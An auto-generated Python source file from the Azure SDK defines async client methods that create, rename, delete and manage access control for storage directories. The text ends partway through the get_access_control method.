"LGPL-2.1-or-later"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 44,892
|
py
|
_directory_operations.py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class DirectoryOperations:
"""DirectoryOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.storage.blob.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def create(
self,
timeout: Optional[int] = None,
directory_properties: Optional[str] = None,
posix_permissions: Optional[str] = None,
posix_umask: Optional[str] = None,
request_id_parameter: Optional[str] = None,
directory_http_headers: Optional["_models.DirectoryHttpHeaders"] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""Create a directory. By default, the destination is overwritten and if the destination already
exists and has a lease the lease is broken. This operation supports conditional HTTP requests.
For more information, see `Specifying Conditional Headers for Blob Service Operations
<https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-conditional-headers-for-
blob-service-operations>`_. To fail if the destination already exists, use a conditional
request with If-None-Match: "*".
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param directory_properties: Optional. User-defined properties to be stored with the file or
directory, in the format of a comma-separated list of name and value pairs "n1=v1, n2=v2, ...",
where each value is base64 encoded.
:type directory_properties: str
:param posix_permissions: Optional and only valid if Hierarchical Namespace is enabled for the
account. Sets POSIX access permissions for the file owner, the file owning group, and others.
Each class may be granted read, write, or execute permission. The sticky bit is also
supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported.
:type posix_permissions: str
:param posix_umask: Only valid if Hierarchical Namespace is enabled for the account. This umask
restricts permission settings for file and directory, and will only be applied when default Acl
does not exist in parent directory. If the umask bit has set, it means that the corresponding
permission will be disabled. Otherwise the corresponding permission will be determined by the
permission. A 4-digit octal notation (e.g. 0022) is supported here. If no umask was specified,
a default umask - 0027 will be used.
:type posix_umask: str
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param directory_http_headers: Parameter group.
:type directory_http_headers: ~azure.storage.blob.models.DirectoryHttpHeaders
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_cache_control = None
_content_type = None
_content_encoding = None
_content_language = None
_content_disposition = None
_lease_id = None
_if_modified_since = None
_if_unmodified_since = None
_if_match = None
_if_none_match = None
if directory_http_headers is not None:
_cache_control = directory_http_headers.cache_control
_content_type = directory_http_headers.content_type
_content_encoding = directory_http_headers.content_encoding
_content_language = directory_http_headers.content_language
_content_disposition = directory_http_headers.content_disposition
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
resource = "directory"
accept = "application/xml"
# Construct URL
url = self.create.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['resource'] = self._serialize.query("resource", resource, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if directory_properties is not None:
header_parameters['x-ms-properties'] = self._serialize.header("directory_properties", directory_properties, 'str')
if posix_permissions is not None:
header_parameters['x-ms-permissions'] = self._serialize.header("posix_permissions", posix_permissions, 'str')
if posix_umask is not None:
header_parameters['x-ms-umask'] = self._serialize.header("posix_umask", posix_umask, 'str')
if _cache_control is not None:
header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", _cache_control, 'str')
if _content_type is not None:
header_parameters['x-ms-content-type'] = self._serialize.header("content_type", _content_type, 'str')
if _content_encoding is not None:
header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", _content_encoding, 'str')
if _content_language is not None:
header_parameters['x-ms-content-language'] = self._serialize.header("content_language", _content_language, 'str')
if _content_disposition is not None:
header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", _content_disposition, 'str')
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DataLakeStorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
create.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
async def rename(
self,
rename_source: str,
timeout: Optional[int] = None,
marker: Optional[str] = None,
path_rename_mode: Optional[Union[str, "_models.PathRenameMode"]] = None,
directory_properties: Optional[str] = None,
posix_permissions: Optional[str] = None,
posix_umask: Optional[str] = None,
source_lease_id: Optional[str] = None,
request_id_parameter: Optional[str] = None,
directory_http_headers: Optional["_models.DirectoryHttpHeaders"] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""Rename a directory. By default, the destination is overwritten and if the destination already
exists and has a lease the lease is broken. This operation supports conditional HTTP requests.
For more information, see `Specifying Conditional Headers for Blob Service Operations
<https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-conditional-headers-for-
blob-service-operations>`_. To fail if the destination already exists, use a conditional
request with If-None-Match: "*".
:param rename_source: The file or directory to be renamed. The value must have the following
format: "/{filesysystem}/{path}". If "x-ms-properties" is specified, the properties will
overwrite the existing properties; otherwise, the existing properties will be preserved.
:type rename_source: str
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param marker: When renaming a directory, the number of paths that are renamed with each
invocation is limited. If the number of paths to be renamed exceeds this limit, a continuation
token is returned in this response header. When a continuation token is returned in the
response, it must be specified in a subsequent invocation of the rename operation to continue
renaming the directory.
:type marker: str
:param path_rename_mode: Determines the behavior of the rename operation.
:type path_rename_mode: str or ~azure.storage.blob.models.PathRenameMode
:param directory_properties: Optional. User-defined properties to be stored with the file or
directory, in the format of a comma-separated list of name and value pairs "n1=v1, n2=v2, ...",
where each value is base64 encoded.
:type directory_properties: str
:param posix_permissions: Optional and only valid if Hierarchical Namespace is enabled for the
account. Sets POSIX access permissions for the file owner, the file owning group, and others.
Each class may be granted read, write, or execute permission. The sticky bit is also
supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported.
:type posix_permissions: str
:param posix_umask: Only valid if Hierarchical Namespace is enabled for the account. This umask
restricts permission settings for file and directory, and will only be applied when default Acl
does not exist in parent directory. If the umask bit has set, it means that the corresponding
permission will be disabled. Otherwise the corresponding permission will be determined by the
permission. A 4-digit octal notation (e.g. 0022) is supported here. If no umask was specified,
a default umask - 0027 will be used.
:type posix_umask: str
:param source_lease_id: A lease ID for the source path. If specified, the source path must have
an active lease and the lease ID must match.
:type source_lease_id: str
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param directory_http_headers: Parameter group.
:type directory_http_headers: ~azure.storage.blob.models.DirectoryHttpHeaders
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:param source_modified_access_conditions: Parameter group.
:type source_modified_access_conditions: ~azure.storage.blob.models.SourceModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_cache_control = None
_content_type = None
_content_encoding = None
_content_language = None
_content_disposition = None
_lease_id = None
_if_modified_since = None
_if_unmodified_since = None
_if_match = None
_if_none_match = None
_source_if_modified_since = None
_source_if_unmodified_since = None
_source_if_match = None
_source_if_none_match = None
if directory_http_headers is not None:
_cache_control = directory_http_headers.cache_control
_content_type = directory_http_headers.content_type
_content_encoding = directory_http_headers.content_encoding
_content_language = directory_http_headers.content_language
_content_disposition = directory_http_headers.content_disposition
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
if source_modified_access_conditions is not None:
_source_if_modified_since = source_modified_access_conditions.source_if_modified_since
_source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since
_source_if_match = source_modified_access_conditions.source_if_match
_source_if_none_match = source_modified_access_conditions.source_if_none_match
accept = "application/xml"
# Construct URL
url = self.rename.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
if marker is not None:
query_parameters['continuation'] = self._serialize.query("marker", marker, 'str')
if path_rename_mode is not None:
query_parameters['mode'] = self._serialize.query("path_rename_mode", path_rename_mode, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-rename-source'] = self._serialize.header("rename_source", rename_source, 'str')
if directory_properties is not None:
header_parameters['x-ms-properties'] = self._serialize.header("directory_properties", directory_properties, 'str')
if posix_permissions is not None:
header_parameters['x-ms-permissions'] = self._serialize.header("posix_permissions", posix_permissions, 'str')
if posix_umask is not None:
header_parameters['x-ms-umask'] = self._serialize.header("posix_umask", posix_umask, 'str')
if _cache_control is not None:
header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", _cache_control, 'str')
if _content_type is not None:
header_parameters['x-ms-content-type'] = self._serialize.header("content_type", _content_type, 'str')
if _content_encoding is not None:
header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", _content_encoding, 'str')
if _content_language is not None:
header_parameters['x-ms-content-language'] = self._serialize.header("content_language", _content_language, 'str')
if _content_disposition is not None:
header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", _content_disposition, 'str')
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if source_lease_id is not None:
header_parameters['x-ms-source-lease-id'] = self._serialize.header("source_lease_id", source_lease_id, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
if _source_if_modified_since is not None:
header_parameters['x-ms-source-if-modified-since'] = self._serialize.header("source_if_modified_since", _source_if_modified_since, 'rfc-1123')
if _source_if_unmodified_since is not None:
header_parameters['x-ms-source-if-unmodified-since'] = self._serialize.header("source_if_unmodified_since", _source_if_unmodified_since, 'rfc-1123')
if _source_if_match is not None:
header_parameters['x-ms-source-if-match'] = self._serialize.header("source_if_match", _source_if_match, 'str')
if _source_if_none_match is not None:
header_parameters['x-ms-source-if-none-match'] = self._serialize.header("source_if_none_match", _source_if_none_match, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DataLakeStorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
rename.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
async def delete(
self,
recursive_directory_delete: bool,
timeout: Optional[int] = None,
marker: Optional[str] = None,
request_id_parameter: Optional[str] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""Deletes the directory.
:param recursive_directory_delete: If "true", all paths beneath the directory will be deleted.
If "false" and the directory is non-empty, an error occurs.
:type recursive_directory_delete: bool
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param marker: When renaming a directory, the number of paths that are renamed with each
invocation is limited. If the number of paths to be renamed exceeds this limit, a continuation
token is returned in this response header. When a continuation token is returned in the
response, it must be specified in a subsequent invocation of the rename operation to continue
renaming the directory.
:type marker: str
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_modified_since = None
_if_unmodified_since = None
_if_match = None
_if_none_match = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
accept = "application/xml"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
query_parameters['recursive'] = self._serialize.query("recursive_directory_delete", recursive_directory_delete, 'bool')
if marker is not None:
query_parameters['continuation'] = self._serialize.query("marker", marker, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DataLakeStorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
delete.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
async def set_access_control(
self,
timeout: Optional[int] = None,
owner: Optional[str] = None,
group: Optional[str] = None,
posix_permissions: Optional[str] = None,
posix_acl: Optional[str] = None,
request_id_parameter: Optional[str] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""Set the owner, group, permissions, or access control list for a directory.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param owner: Optional. The owner of the blob or directory.
:type owner: str
:param group: Optional. The owning group of the blob or directory.
:type group: str
:param posix_permissions: Optional and only valid if Hierarchical Namespace is enabled for the
account. Sets POSIX access permissions for the file owner, the file owning group, and others.
Each class may be granted read, write, or execute permission. The sticky bit is also
supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported.
:type posix_permissions: str
:param posix_acl: Sets POSIX access control rights on files and directories. The value is a
comma-separated list of access control entries. Each access control entry (ACE) consists of a
scope, a type, a user or group identifier, and permissions in the format
"[scope:][type]:[id]:[permissions]".
:type posix_acl: str
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_match = None
_if_none_match = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
action = "setAccessControl"
accept = "application/xml"
# Construct URL
url = self.set_access_control.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['action'] = self._serialize.query("action", action, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if owner is not None:
header_parameters['x-ms-owner'] = self._serialize.header("owner", owner, 'str')
if group is not None:
header_parameters['x-ms-group'] = self._serialize.header("group", group, 'str')
if posix_permissions is not None:
header_parameters['x-ms-permissions'] = self._serialize.header("posix_permissions", posix_permissions, 'str')
if posix_acl is not None:
header_parameters['x-ms-acl'] = self._serialize.header("posix_acl", posix_acl, 'str')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.patch(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DataLakeStorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
if cls:
return cls(pipeline_response, None, response_headers)
set_access_control.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
async def get_access_control(
self,
timeout: Optional[int] = None,
upn: Optional[bool] = None,
request_id_parameter: Optional[str] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""Get the owner, group, permissions, or access control list for a directory.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param upn: Optional. Valid only when Hierarchical Namespace is enabled for the account. If
"true", the identity values returned in the x-ms-owner, x-ms-group, and x-ms-acl response
headers will be transformed from Azure Active Directory Object IDs to User Principal Names. If
"false", the values will be returned as Azure Active Directory Object IDs. The default value is
false.
:type upn: bool
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_match = None
_if_none_match = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
action = "getAccessControl"
accept = "application/xml"
# Construct URL
url = self.get_access_control.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['action'] = self._serialize.query("action", action, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
if upn is not None:
query_parameters['upn'] = self._serialize.query("upn", upn, 'bool')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DataLakeStorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-owner']=self._deserialize('str', response.headers.get('x-ms-owner'))
